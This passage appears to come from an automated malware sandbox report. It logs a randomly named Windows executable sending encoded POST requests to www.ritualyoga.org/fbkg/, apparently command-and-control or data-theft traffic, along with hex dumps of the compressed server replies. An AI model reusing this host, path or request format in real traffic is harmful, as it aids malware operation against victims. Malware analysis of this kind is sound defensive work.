a3 e9 78 fa 20 a0 7e 38 9b a7 6b 89 74 e3 a1 c1 50 bd 96 83 4b 1f 0e 30 9b e1 b5 1b 52 e5 40 1e 31 f2 65 b0 8a 59 ae b7 56 89 cb aa 24 56 8b 4b 43 d8 0d d3 49 75 38 f1 03 af 12 79 de ba 11 9b 1d 2d 47 4d fa 59 21 75 02 e3 c8 1b b8 47 7f ea a6 c3
                                                                                                                                                                                                Data Ascii: 1351\kSO5sjbB `:1S)8Md\Z*J21$L!>>:w$Ua^H&TN8i4OGW%QOr=L((L(d+7C9Cw>{55&%-&IAqC:PZ0o777pWg7g1Q!zdq%c)&D`MSeu"}p+\h4r?d;+p I@D'tz9KZ/[!~\cUgy|D@S42]NC3E:@KQ\HXjskAUc>1'?Ov\-7crQN2R&j1R42A`E"@Mm%T"BY.r5f$joQa6N'|&`fmBO,&yh[4:k,U.kD2y<=<,QEjr~8dlr.Jv;\$9cR wpp`LMZuU9mEdwBC2<qr*Jq)N'aKF;;{')H{5QN%TxwQGRId Ej<kw[CvOe?uItO;K}f8)),Dfn5 #DCXpx]1x ~8ktPK0R@1eYV$VKCIu8y-GMY!uG
                                                                                                                                                                                                Nov 17, 2023 19:29:46.039911032 CET727INData Raw: 89 4c 36 96 74 cb 63 46 f3 bf fe ba 35 63 96 d0 98 c0 76 42 de 7f 14 05 f0 9a f3 c8 fb 4d 06 08 86 05 83 32 49 51 55 4a 64 18 17 81 9b ca a3 58 de 3e 98 42 08 ee 41 44 e6 f2 b5 c4 91 bb ee c3 6d cb 94 ac 99 2d a1 b8 10 9b 3a 74 29 b3 99 b9 e9 a4
                                                                                                                                                                                                Data Ascii: L6tcF5cvBM2IQUJdX>BADm-:t)_0]Hd~8A5Qgt)N0g*Xx/m<gzF$ET3i7WZ"qt$%$Q*]e:C1r$5(1z_%HV(U%+%3{m39W*
                                                                                                                                                                                                Nov 17, 2023 19:29:46.039980888 CET729INData Raw: 4f 52 89 8e a6 04 7d 67 b1 c0 d6 37 4e 02 68 ef 45 f5 4e f0 78 fa 50 21 3a 7c 1c bb d5 5f e3 9f 3d 9b 33 27 c0 c2 38 9d e0 fd 0f 3f e4 c7 7b 16 eb 9f fc cf 0e 3a f6 ba 57 20 fa 44 a3 ab 94 19 7d 79 23 3f 81 95 f9 64 21 a4 83 03 07 9a 70 20 47 ee
                                                                                                                                                                                                Data Ascii: OR}g7NhENxP!:|_=3'8?{:W D}y#?d!p G<H+Lh)z4m%gn4B_B$*tl-:Ked6Dd1C]MC.\elYl@,Qn)eb2Y1"bOQvG@
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040133953 CET730INData Raw: 4e 5d b0 5a bf dc 90 4c 50 f1 bb 55 ca 16 60 02 a0 f2 7a 7b 26 e7 b9 0b e5 83 f7 cd 2c e6 43 0b 35 a7 ba 07 00 28 a6 44 53 b0 43 09 e7 4a 09 a6 69 f0 7a 82 8e fb 30 82 32 39 0e 5e b9 c1 5c 0a 1f 51 0b b6 0a cd 30 cb ea 1b b1 0b 3b 1a 04 73 72 af
                                                                                                                                                                                                Data Ascii: N]ZLPU`z{&,C5(DSCJiz029^\Q0;sr=ZaD(X-8=hXnf6+-Pr!HA3Z2kIUFWQkY.Io%R=ejHVEi-}].9s3Q<8>,W^TG
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040186882 CET730INData Raw: cd e6 4b fc dd da 10 4b bf e3 52 c5 76 c3 69 6c ed e0 ef 96 06 a8 28 6c 9f f4 2f 3a e7 c7 ef 7b fd d3 f6 bb 8c 75 3d e4 bc fb ee ac d7 ed b7 0f 0e 72 54 c0 51 c7 4f 43 0f b9 e8 9e 83 ee c2 e4 95 5c ea b1 ef cf cf 7a 67 9d 5c 7c 9a 51 0d f1 6e eb
                                                                                                                                                                                                Data Ascii: KKRvil(l/:{u=rTQOC\zg\|Qn?R;T{kqN9/xwMb:XE0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                31192.168.11.2050158216.40.34.4180C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:45.891000986 CET725OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ritualyoga.org
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.ritualyoga.org
                                                                                                                                                                                                Referer: http://www.ritualyoga.org/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 6d 4c 52 4b 67 4f 31 78 46 72 47 65 71 49 43 54 69 50 39 6d 41 4c 63 62 49 63 4c 6b 2b 46 35 4c 36 74 6b 4b 34 31 42 6b 37 42 77 45 74 61 4e 56 54 33 63 6e 66 44 75 44 39 70 59 50 6a 4c 4d 47 68 54 6b 34 55 42 44 30 47 5a 73 69 2f 53 35 42 4c 33 66 41 72 59 76 38 65 55 31 5a 73 62 30 48 6d 79 4d 44 7a 51 74 43 39 79 68 31 4f 43 64 70 49 32 6f 78 41 37 45 43 53 57 68 30 76 45 6d 30 6c 62 4d 48 69 76 6e 4d 69 6c 63 6c 52 58 4c 2b 62 55 47 73 68 6c 51 74 55 67 36 51 36 53 6f 61 37 57 57 57 34 68 4c 64 75 74 31 4e 6a 75 43 75 41 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=EmLRKgO1xFrGeqICTiP9mALcbIcLk+F5L6tkK41Bk7BwEtaNVT3cnfDuD9pYPjLMGhTk4UBD0GZsi/S5BL3fArYv8eU1Zsb0HmyMDzQtC9yh1OCdpI2oxA7ECSWh0vEm0lbMHivnMilclRXL+bUGshlQtUg6Q6Soa7WWW4hLdut1NjuCuA==
                                                                                                                                                                                                Nov 17, 2023 19:29:46.039764881 CET726INHTTP/1.1 404 Not Found
                                                                                                                                                                                                server: nginx/1.14.2
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:29:45 GMT
                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                x-request-id: d625bbea-cbb2-4495-8524-f5158d20e6b2
                                                                                                                                                                                                x-runtime: 0.031355
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6b 53 db c6 bb 7f 9f 4f b1 35 73 6a 93 62 f9 42 20 81 60 3a 8e 31 84 53 02 29 38 4d fb cf 64 5c d9 5a db 2a b2 e4 4a 32 97 f6 e4 bb 9f df f3 ec ae b4 b2 31 a1 d0 f3 e2 cc 24 4c 1a 21 ed 3e f7 db ee 3e db bd ef 0e ce 3a bd df de 77 c5 24 9d 06 fb cf f6 e8 1f 11 b8 e1 b8 55 92 61 89 5e 48 d7 db 7f 26 c4 de 54 a6 ae 18 4e dc 38 91 69 ab 34 4f 47 d5 57 25 51 e3 4f a9 9f 06 72 bf 3d 4c fd 28 14 9d 28 4c e3 28 08 64 bc 2b ba 37 43 39 e3 b7 43 77 3e 9e a4 7b 35 35 94 26 25 e9 2d 26 e1 49 88 41 e4 dd 8a bf f9 11 bf b8 c3 cb 71 1c cd 43 af 3a 8c 82 08 50 d6 0e db f4 f3 5a 0f 30 6f 37 37 37 cd ab a9 1b 8f fd 70 57 d4 67 37 ea d5 97 67 19 e0 0d 31 db 10 51 b0 21 e6 f8 9b 7a 19 9e 11 e8 ac 8e dc a9 1f dc ee 8a 89 0c ae 64 ea 0f dd 0d 71 25 63 cf 0d f1 e0 c6 be 8b 29 89 1b 26 d5 44 c6 fe c8 60 e3 99 89 ff 97 dc 05 b9 8d 4d 83 53 88 c0 0f 65 75 22 7d 70 ba 2b 1a af 16 88 99 c5 b2 88 5c 81 68 34 72 00 d7 13 3f 95 d5 64 e6 0e 01 1b e3 ab d7 b1 3b 2b 70 84 97 ce 20 ba c9 a5 15 c5 1e 49 1a 40 44 12 05 be 27 d6 ba dd ae a1 74 e6 7a 9e 1f 8e f1 39 93 8c 10 4b c2 12 e2 da f7 d2 c9 ae d8 d9 5a a4 99 b4 2f e3 0c 5b a6 90 fa 21 7e 0c 96 5c 63 d0 55 67 ab 79 d8 7c b1 44 40 dd d9 92 53 d1 a0 ff 16 f8 99 34 32 e0 19 5d 4e 13 43 33 e8 45 a1 3a 0d 03 40 08 4b 0f 98 51 04 db 5c a2 b9 48 58 01 6a 73 6b 41 55 8e 07 63 f7 83 e4 3e 31 1f d4 e9 27 93 01 eb a1 1a bb 9e 3f 4f 76 c5 8b 5c a7 86 2d 10 9e db a7 10 9e 9f cc 02 17 a6 37 08 a2 e1 a5 01 63 14 f1 72 51 11 4e 32 9f 02 52 ee 26 99 6a 31 52 34 32 06 c8 99 98 92 41 94 a6 d1 b4 60 18 45 8a ef 22 40 bb 4d c6 be 6d b2 86 8f 25 54 bb 22 8c 42 59 10 ff da 10 2e e2 c2 1b 72 d3 81 d1 92 cf b0 35 66 24 6a 6f cd 0c b0 51 af ff d7 b2 e9 dc 61 36 4e 12 cd e3 a1 14 cf 97 ad 27 97 7c 26 a2 c5 b0 60 66 ff 6d 42 ce b2 13 1d ec d0 4f a6 dd 2c 26 c1 c2 bb 1d fa 79 80 c6 14 89 b6 0c 0b fe 68 5b 83 92 c8 1d 92 34 a4 3a 9e 8b f0 6b 08 b6 2c ff 55 2e b1 08 a1 6b 14 44 d7 bb c2 9d a7 d1 32 ed 79 3c 3d 3c 2c a8 cb f1 c3 51 94 01 cf c5 b6 e4 ad 45 6a 1c 72 a2 7e 38 9f 0e 64 6c b9 ca 72 fc 2e 4a cc 04 91 76 3b 0b e9 b9 5c e0 24 39 d6 cc 98 63 1d 52 f3 20 77 70 70 60 18 4c e5 4d 5a 75 03 7f 8c 04 c0 03 8b bc 11 91 8b bc 55 03 39 a2 10 6d 45 c5 c5 d0 bb 0c 64 77 42 02 ce 43 c2 32 9f 87 db f4 b3 3c d3 71 91 1a af 72 2a ee 4a 71 87 1d fc 29 4e 9d f8 9e 27 c3 0c 61 e6 b0 4b ee 06 c3 10 46 aa 3b af ea 3b f5 ad d7 e2 0b db b6 bb 7b e5 27 c8 29 48 7b d9 88 ed ed ed ec b3 93 c6 c8 35 d5 51 ec 4e 25 54 78 e7 18 c3 77 f6 51 47 52 83 a2 00 c3 49 64 20 87 45 84 6a 3c 86 6b 77 5b 43 76 4f 65 3f 75 07 81 91 49 16 fb 95 04 74 80 00 4f 81 3b 4b 90 0b cd 13 7d 66 38 05 18 29 a5 29 91 1a dd 2c 44 c0 66 6e 35 9e e7 dd 0f 01 b9 95 c2 a6 96 f9 02 20 23 f7 d5 04 98 e9 e9 44 43 58 70 78 c5 5d 31 a3 e9 78 fa 20 a0 7e 38 9b a7 6b 89 74 e3 a1 c1 50 bd 96 83 4b 1f 0e 30 9b e1 b5 1b 52 e5 40 1e 31 f2 65 b0 8a 59 ae b7 56 89 cb aa 24 56 8b 4b 43 d8 0d d3 49 75 38 f1 03 af 12 79 de ba 11 9b 1d 2d 47 4d fa 59 21 75 02 e3 c8 1b b8 47 7f ea a6 c3
                                                                                                                                                                                                Data Ascii: 1351\kSO5sjbB `:1S)8Md\Z*J21$L!>>:w$Ua^H&TN8i4OGW%QOr=L((L(d+7C9Cw>{55&%-&IAqC:PZ0o777pWg7g1Q!zdq%c)&D`MSeu"}p+\h4r?d;+p I@D'tz9KZ/[!~\cUgy|D@S42]NC3E:@KQ\HXjskAUc>1'?Ov\-7crQN2R&j1R42A`E"@Mm%T"BY.r5f$joQa6N'|&`fmBO,&yh[4:k,U.kD2y<=<,QEjr~8dlr.Jv;\$9cR wpp`LMZuU9mEdwBC2<qr*Jq)N'aKF;;{')H{5QN%TxwQGRId Ej<kw[CvOe?uItO;K}f8)),Dfn5 #DCXpx]1x ~8ktPK0R@1eYV$VKCIu8y-GMY!uG
                                                                                                                                                                                                Nov 17, 2023 19:29:46.039911032 CET727INData Raw: 89 4c 36 96 74 cb 63 46 f3 bf fe ba 35 63 96 d0 98 c0 76 42 de 7f 14 05 f0 9a f3 c8 fb 4d 06 08 86 05 83 32 49 51 55 4a 64 18 17 81 9b ca a3 58 de 3e 98 42 08 ee 41 44 e6 f2 b5 c4 91 bb ee c3 6d cb 94 ac 99 2d a1 b8 10 9b 3a 74 29 b3 99 b9 e9 a4
                                                                                                                                                                                                Data Ascii: L6tcF5cvBM2IQUJdX>BADm-:t)_0]Hd~8A5Qgt)N0g*Xx/m<gzF$ET3i7WZ"qt$%$Q*]e:C1r$5(1z_%HV(U%+%3{m39W*
                                                                                                                                                                                                Nov 17, 2023 19:29:46.039980888 CET729INData Raw: 4f 52 89 8e a6 04 7d 67 b1 c0 d6 37 4e 02 68 ef 45 f5 4e f0 78 fa 50 21 3a 7c 1c bb d5 5f e3 9f 3d 9b 33 27 c0 c2 38 9d e0 fd 0f 3f e4 c7 7b 16 eb 9f fc cf 0e 3a f6 ba 57 20 fa 44 a3 ab 94 19 7d 79 23 3f 81 95 f9 64 21 a4 83 03 07 9a 70 20 47 ee
                                                                                                                                                                                                Data Ascii: OR}g7NhENxP!:|_=3'8?{:W D}y#?d!p G<H+Lh)z4m%gn4B_B$*tl-:Ked6Dd1C]MC.\elYl@,Qn)eb2Y1"bOQvG@
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040133953 CET730INData Raw: 4e 5d b0 5a bf dc 90 4c 50 f1 bb 55 ca 16 60 02 a0 f2 7a 7b 26 e7 b9 0b e5 83 f7 cd 2c e6 43 0b 35 a7 ba 07 00 28 a6 44 53 b0 43 09 e7 4a 09 a6 69 f0 7a 82 8e fb 30 82 32 39 0e 5e b9 c1 5c 0a 1f 51 0b b6 0a cd 30 cb ea 1b b1 0b 3b 1a 04 73 72 af
                                                                                                                                                                                                Data Ascii: N]ZLPU`z{&,C5(DSCJiz029^\Q0;sr=ZaD(X-8=hXnf6+-Pr!HA3Z2kIUFWQkY.Io%R=ejHVEi-}].9s3Q<8>,W^TG
                                                                                                                                                                                                Nov 17, 2023 19:29:46.040186882 CET730INData Raw: cd e6 4b fc dd da 10 4b bf e3 52 c5 76 c3 69 6c ed e0 ef 96 06 a8 28 6c 9f f4 2f 3a e7 c7 ef 7b fd d3 f6 bb 8c 75 3d e4 bc fb ee ac d7 ed b7 0f 0e 72 54 c0 51 c7 4f 43 0f b9 e8 9e 83 ee c2 e4 95 5c ea b1 ef cf cf 7a 67 9d 5c 7c 9a 51 0d f1 6e eb
                                                                                                                                                                                                Data Ascii: KKRvil(l/:{u=rTQOC\zg\|Qn?R;T{kqN9/xwMb:XE0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                32216.40.34.4180192.168.11.2050159C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:48.527652979 CET732OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ritualyoga.org
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.ritualyoga.org
                                                                                                                                                                                                Referer: http://www.ritualyoga.org/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 6d 4c 52 4b 67 4f 31 78 46 72 47 4d 35 67 43 41 78 6e 39 6a 67 4c 64 55 6f 63 4c 39 4f 46 39 4c 36 78 6b 4b 35 77 4b 6b 49 6c 77 46 4d 71 4e 55 52 54 63 67 66 44 75 62 4e 70 5a 53 7a 4b 41 47 68 65 45 34 55 4e 44 30 48 39 73 6a 4b 47 35 48 37 33 65 4c 4c 59 73 39 65 55 30 4f 38 62 45 48 6d 4f 59 44 79 45 74 44 4e 57 68 30 4e 36 64 6c 37 75 76 32 67 37 47 45 53 57 75 36 50 45 57 30 6c 58 31 48 67 2f 64 4e 54 52 63 6b 78 33 4c 2f 62 55 4a 35 68 6c 58 76 55 68 33 55 76 6a 32 55 4b 2b 70 57 72 42 55 62 4b 63 39 48 51 2f 38 38 53 73 6c 6e 4b 71 45 43 56 38 6a 49 43 71 55 74 2b 61 64 77 52 5a 6b 41 50 6f 67 37 57 4c 55 79 33 32 34 6e 31 77 49 32 44 6e 71 72 63 74 4f 71 6d 65 6d 48 57 62 5a 50 62 6a 43 54 72 49 50 2f 30 54 49 48 75 51 59 57 75 71 68 6c 67 66 69 44 52 64 5a 34 31 58 4f 56 4f 55 66 46 53 31 73 6f 72 38 50 63 69 30 2b 4e 56 71 32 37 6a 6d 77 39 43 35 37 57 78 56 65 6b 72 51 6f 58 30 74 58 42 44 6f 4e 71 6c 66 63 71 68 6f 77 66 6e 69 77 47 52 49 2b 59 36 39 31 31 34 5a 69 7a 4c 45 78 50 4c 5a 36 55 74 53 79 64 73 7a 45 43 6d 2f 76 62 6c 42 51 44 6c 4d 6b 31 72 65 74 36 48 39 33 6f 57 42 64 61 41 67 47 4e 68 5a 4e 6e 33 63 56 46 74 50 45 4b 4d 6d 4e 37 30 6b 69 77 41 48 66 4c 46 53 76 33 79 64 6f 61 43 73 37 65 77 6b 79 64 65 68 67 7a 49 70 41 49 4b 49 7a 52 38 4a 5a 51 4b 44 6c 4d 77 35 4c 68 52 30 33 50 39 4f 2b 65 78 61 73 53 5a 34 43 63 57 76 45 4a 64 2f 65 66 36 36 69 74 4d 45 6d 75 32 36 44 64 51 37 74 70 61 73 6e 33 77 51 4a 33 79 64 2b 39 57 67 39 46 78 33 6d 49 67 44 31 63 64 76 54 6f 7a 2f 78 65 33 32 43 65 75 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=EmLRKgO1xFrGM5gCAxn9jgLdUocL9OF9L6xkK5wKkIlwFMqNURTcgfDubNpZSzKAGheE4UND0H9sjKG5H73eLLYs9eU0O8bEHmOYDyEtDNWh0N6dl7uv2g7GESWu6PEW0lX1Hg/dNTRckx3L/bUJ5hlXvUh3Uvj2UK+pWrBUbKc9HQ/88SslnKqECV8jICqUt+adwRZkAPog7WLUy324n1wI2DnqrctOqmemHWbZPbjCTrIP/0TIHuQYWuqhlgfiDRdZ41XOVOUfFS1sor8Pci0+NVq27jmw9C57WxVekrQoX0tXBDoNqlfcqhowfniwGRI+Y69114ZizLExPLZ6UtSydszECm/vblBQDlMk1ret6H93oWBdaAgGNhZNn3cVFtPEKMmN70kiwAHfLFSv3ydoaCs7ewkydehgzIpAIKIzR8JZQKDlMw5LhR03P9O+exasSZ4CcWvEJd/ef66itMEmu26DdQ7tpasn3wQJ3yd+9Wg9Fx3mIgD1cdvToz/xe32Ceuo=
                                                                                                                                                                                                Nov 17, 2023 19:29:48.687988997 CET733INHTTP/1.1 404 Not Found
                                                                                                                                                                                                server: nginx/1.14.2
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:29:48 GMT
                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                x-request-id: 6fc8b339-6fce-48b3-be50-02f78ebfa919
                                                                                                                                                                                                x-runtime: 0.040695
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 31 34 38 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 3c 6b 73 da 46 d7 df f3 2b b6 78 9e 82 5b 23 6e be e1 18 77 08 e0 4b ec 80 83 71 9c cb 64 a8 40 0b 28 16 12 96 04 98 f4 e9 7f 7f ce 39 bb 2b ad c0 38 ae dd f7 c3 3b 93 78 d2 c8 d2 ee b9 df 76 f7 6c 0f 7f a9 b7 6a 9d 4f 97 0d 36 0a c7 ce d1 ab 43 fc 87 39 a6 3b ac a4 b8 9b c2 17 dc b4 8e 5e 31 76 38 e6 a1 c9 fa 23 d3 0f 78 58 49 4d c3 41 76 3f c5 72 f4 29 b4 43 87 1f 55 fb a1 ed b9 ac e6 b9 a1 ef 39 0e f7 0f 58 e3 be cf 27 f4 b6 6f 4e 87 a3 f0 30 27 86 e2 a4 20 5c c0 24 78 62 ac e7 59 0b f6 17 3d c2 2f 66 ff 76 e8 7b 53 d7 ca f6 3d c7 03 28 1b c7 55 fc 79 2d 07 a8 b7 a5 52 49 bd 1a 9b fe d0 76 0f 58 7e 72 2f 5e fd fd 2a 02 bc c5 26 5b cc 73 b6 d8 14 fe 86 56 84 67 00 74 66 07 e6 d8 76 16 07 6c c4 9d 19 0f ed be b9 c5 66 dc b7 4c 17 1e 4c df 36 61 4a 60 ba 41 36 e0 be 3d 50 d8 68 66 60 7f e7 07 40 6e a1 a4 70 32 e6 d8 2e cf 8e b8 0d 9c 1e b0 c2 fe 12 31 13 9f 27 91 0b 10 85 42 0c 60 3e b2 43 9e 0d 26 66 1f 60 c3 f8 ec dc 37 27 09 8e e0 a5 d1 f3 ee 63 69 79 be 85 92 06 20 2c f0 1c db 62 1b 8d 46 43 51 3a 31 2d cb 76 87 f0 39 92 0c 63 2b c2 62 6c 6e 5b e1 e8 80 95 77 96 69 46 ed 73 3f c2 16 29 24 7f 0c 3f 0a 4b ac 31 d0 55 6d a7 78 5c dc 5e 21 20 6f ec f0 31 2b e0 7f 13 fc 8c 0a 11 f0 88 2e a3 08 43 23 e8 49 a1 1a 05 05 80 31 4d 0f 30 23 09 b6 b8 42 73 92 b0 04 d4 e2 ce 92 aa 0c 0b 8c dd 76 82 c7 c4 5c cf e3 4f 24 03 d2 43 d6 37 2d 7b 1a 1c b0 ed 58 a7 8a 2d 20 3c b6 4f c6 2c 3b 98 38 26 98 5e cf f1 fa b7 0a 8c 52 c4 de b2 22 8c 60 3a 06 48 b1 9b 44 aa 85 91 ac 10 31 80 ce 44 94 f4 bc 30 f4 c6 09 c3 48 52 fc 10 01 d2 6d 22 f6 75 93 55 7c ac a0 3a 60 ae e7 f2 84 f8 37 fa e0 22 26 78 43 6c 3a 60 b4 e8 33 64 8d 11 89 d2 5b 23 03 2c e4 f3 ff 59 35 9d 07 cc c6 08 bc a9 df e7 ec b7 55 eb 89 25 1f 89 68 39 2c a8 d9 7f a9 90 b3 ea 44 f5 32 fe 44 da 8d 62 12 58 78 a3 86 3f 4f d0 98 20 51 97 61 c2 1f 75 6b 10 12 79 40 92 8a 54 c3 32 21 fc 2a 82 35 cb df 8f 25 e6 41 e8 1a 38 de fc 80 99 d3 d0 5b a5 3d 8e a7 c7 c7 09 75 19 b6 3b f0 22 e0 b1 d8 56 bc 35 49 8d 81 4e d4 75 a7 e3 1e f7 35 57 59 8d df 49 89 a9 20 52 ad 46 21 3d 96 0b 38 49 8c 35 32 66 5f 86 d4 38 c8 d5 eb 75 c5 60 c8 ef c3 ac e9 d8 43 48 00 34 30 c9 1b 12 b9 cc 5b d6 e1 03 0c d1 5a 54 5c 0e bd ab 40 0e 46 28 e0 38 24 ac f2 79 bc 8b 3f ab 33 0d 13 52 e3 2c a6 e2 a1 14 77 5c 83 3f c9 a9 23 db b2 b8 1b 21 8c 1c 76 c5 dd c0 30 98 92 6a 79 3f 5f ce ef bc 66 7f 93 6d 9b 07 33 3b 80 9c 02 69 2f 1a b1 bb bb 1b 7d 36 42 1f 72 4d 76 e0 9b 63 0e 2a 7c 70 8c e2 3b fa 28 23 a9 42 91 80 61 04 dc e1 fd 24 42 31 1e 86 4b 77 db 80 ec 1e f2 6e 68 f6 1c 25 93 28 f6 0b 09 c8 00 01 3c 39 e6 24 80 5c a8 9e f0 33 c1 49 c0 08 31 4d b1 50 e9 66 29 02 16 63 ab b1 2c eb 71 08 90 5b 31 6c 4a 99 2f 01 52 72 5f 4f 80 9a 1e 8e 24 84 25 87 17 dc 25 33 9a 8c a7 4f 02 6a bb 93 69 b8 11 70 d3 ef 2b 0c d9 39 ef dd da e0 00 93 09 bc 36 5d ac 1c d0 23 06 36 77 d6 31 4b f5 d6 3a 71 69 95 c4 7a 71 49 08 07 6e 38 ca f6 47 b6 63 65 3c cb da 54 62 d3 a3 e5 a0 88 3f 6b a4 8e 60 0c 7e 0f ee d1 1d 9b 61 7f c4
                                                                                                                                                                                                Data Ascii: 148C<ksF+x[#nwKqd@(9+8;xvljO6C9;^1v8#xXIMAv?r)CU9X'oN0' \$xbY=/fv{S=(Uy-RIvX~r/^*&[sVgtfvlfLL6aJ`A6=Phf`@np2.1'B`>C&f`7'ciy ,bFCQ:1-v9c+bln[wiFs?)$?K1Umx\^! o1+.C#I1M0#Bsv\O$C7-{X- <O,;8&^R"`:HD1D0HRm"uU|:`7"&xCl:`3d[#,Y5U%h9,D2DbXx?O Qauky@T2!*5%A8[=u;"V5INu5WYI RF!=8I52f_8u`CH40[ZT\@F(8$y?3R,w\?#!v0jy?_fm3;i/}6BrMvc*|p;(#Ba$B1Kwnh%(<9$\3I1MPf)c,q[1lJ/Rr_O$%%3Ojip+96]#6w1K:qizqIn8Gce<Tb?k`~a
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688020945 CET734INData Raw: 83 ad 15 dd d2 98 c1 f4 fb f7 85 1a b3 82 46 05 b6 0b f4 fe 13 cf 01 af 69 7b d6 27 ee 40 30 4c 18 94 4a 8a a2 52 42 c3 b8 72 cc 90 9f f8 7c f1 64 0a 41 70 4f 22 32 96 af 26 8e d8 75 9f 6e 5b aa 64 8d 6c 09 8a 0b 56 92 a1 4b 98 cd c4 0c 47 dd 84
                                                                                                                                                                                                Data Ascii: Fi{'@0LJRBr|dApO"2&un[dlVKGYB"ZT%iaN}{|f,CL]3vgpD-?s74<l8,,kpCF1=WX%f4Civ _>DF8"aC4$nRPqxxqpr&$b\h
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688215971 CET736INData Raw: 4f 1e 84 1c 3a 9a 02 e8 3b f3 19 6c 7d c3 49 00 ee bd 88 de 09 1a 8f 1f 32 48 87 0d c7 6e f9 d7 f0 cf a1 ce 99 e1 c0 c2 38 1c c1 fb df 7f 8f 8f f7 34 d6 bf d8 5f 0d e8 d8 6b cc 80 e8 0b 89 2e 93 26 f4 e9 ad f8 04 96 c7 93 19 e3 06 1c 38 e0 84 3a
                                                                                                                                                                                                Data Ascii: O:;l}I2Hn84_k.&8:S'3Au6Bk$nGu*N.VLFi3h! =`u:lWA-<}shLJHmTJc jaK79s@Zr6oIal)ewbdF,oe/`eOZ
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688643932 CET737INData Raw: 4e 26 9d 68 b1 fe a2 85 7e 04 f1 35 bd 89 5d b0 52 bf d4 90 8c 50 e1 77 ad 94 4d c0 04 80 c2 eb f5 99 94 e7 ae 84 0f 3e 36 33 99 0f 35 d4 94 ea 9e 00 20 99 12 55 c1 0e 4a 68 0b 25 a8 a6 c1 f9 08 3a ee 5d 0f 94 49 71 70 66 3a 53 ce 6c 88 5a 60 ab
                                                                                                                                                                                                Data Ascii: N&h~5]RPwM>635 UJh%:]Iqpf:SlZ`bY|Cvz+jg"z(V8@=pXlf:k-r@HZ^K0_jwL}D5X6PqavEB%:/*1$1K{zbJ#hO6O
                                                                                                                                                                                                Nov 17, 2023 19:29:48.688672066 CET737INData Raw: 76 77 ed f0 5d 63 3c 2d ee d6 ad f7 7b e1 c4 0c dc d2 fc fd 5b 80 c9 ca 37 c3 f2 f1 7d 69 7c 36 ac 17 fa d6 ac e3 7d cf dd f3 52 b1 c6 a7 5e 45 58 c3 df 60 85 78 55 43 5e eb 91 f7 16 e4 bd 7f 71 a9 08 6f 68 c8 f7 f2 f6 7d 0a af 38 ac de f6 49 dc
                                                                                                                                                                                                Data Ascii: vw]c<-{[7}i|6}R^EX`xUC^qoh}8I._e6SG"xG,W]5/a@NwKl9_#&{<^p>v7Of>/k'g9j!6ZqQ~hZ5njAjznjZvZ


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                32192.168.11.2050159216.40.34.4180C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:48.527652979 CET732OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ritualyoga.org
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
